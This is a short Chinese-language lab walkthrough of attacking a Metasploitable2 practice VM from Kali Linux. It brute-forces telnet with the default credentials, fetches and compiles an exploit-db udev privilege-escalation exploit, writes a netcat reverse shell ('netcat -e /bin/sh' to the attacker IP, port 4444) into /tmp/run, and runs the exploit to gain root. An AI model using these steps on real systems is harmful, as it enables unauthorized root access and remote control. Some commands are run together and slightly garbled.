实验环境:
攻击机:kali linux
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129
攻击过程:
step1:爆破Metasploittable2的telnet登陆密码,用户名:msfadmin,密码:msfadmin //用户非root权限
step2:msf 登陆Metasploittable2后,下载exp,
地址:wget http://www.exploit-db.com/download/8572 //下载不下来,需要在kali linux中下载,然后开启apache3服务,再wget 下载。
step3:kali 中设置nc监听,
使用 netcat 进行监听 后期返回的shell。
命令:nc -lvp 4444
step4:msf 登陆Metasploittable2中,编译执行exp,获取root
命令:gcc 源文件 -o exploit echo '#!/bin/sh' > /tmp/run //此时源文件为8572.c
命令:echo '/bin/netcat -e /bin/sh ip地址 4444' >> /tmp/run //此时ip地址为192.168.172.134
命令:ps -edf | grep udev //搜索udev程序的pid
step5:执行exploit 具有root权限的pid -1 ./exploit 数字pid -1
命令:./exploit 2178 //原来pid为2179
总结:telnet登陆Metasploittable2,后为非root用户,需要做的就是提权,这里用到的是exp,然后nc进行连接。